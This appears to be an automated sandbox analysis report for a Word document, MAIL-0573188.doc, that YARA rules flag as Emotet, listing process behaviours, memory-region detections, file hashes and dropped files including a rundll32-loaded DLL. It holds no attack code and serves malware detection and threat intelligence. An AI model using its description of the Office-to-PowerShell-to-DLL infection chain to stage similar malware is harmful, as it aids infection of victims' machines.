Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,

7_2_10007D46

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Source: Yara match	File source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE

ID:	337092
Product:	CloudBasic
Start time:	18:43:35
Start date:	07.01.2021
Sample:	MAIL-0573188.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	7ad5e41d03b2dfe72af417fa5b0cc164
SHA1:	2a6c0fa93aba9ce560d271ce65d79db69422fc6c
SHA256:	2d6cbcbc803638a13705a3b26afb3b34b72bc58601215566ba858c62882b8e61
Filetype:	Microsoft Word document (32009/1) 79.99%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1917291-551E-40AF-9919-E039C2A6E74E}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171	data	3B7B4F5326139F48EFA0AAE509E2FE58	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\MAIL-0573188.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Fri Jan 8 01:44:34 2021, length=170496, window=hide	4DF39A955577FBDA718F9D744D03D389	1F96596530013454CB944E4693228373D9BF8504	970267C26980A032F6BB5CB8D5FD612C80629BAE750CEF7098FA4C11B04C28F0
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	76E48FC73FE7372631FFFC13033A5895	3F72CAC7C77D9A1647FE86E6EDA4FE8914349C28	ADE4E1003850612E9367818208AE5BD93DADFAFE4E7A5DFBA12969AB807BE60C
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	6AF5EAEBE6C935D9A5422D99EEE6BEF0	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\20G6ZLCGULCSH5TY8WGA.temp	data	975DDE3BEB992D275DFD4DD1F527950A	14DCBA69A937054538AFBB71BEC3B98CD9D80FB8	254E0DC72C97BCF7AC365492C16C07DF602BE3D408DD827276282F50C4A0EFB4
C:\Users\user\Desktop\~$IL-0573188.doc	data	6AF5EAEBE6C935D9A5422D99EEE6BEF0	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll	data	3771989E5967540F6AABFD211CCFA9F1	8C4B4D489EC21B0F8F7613E767E248F511257F61	F3A6E22AF9D7C859F8CACC9AE43155CE6EDA005579FC7C8F195FB91D4C0D3B22

Analysis Report MAIL-0573188.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs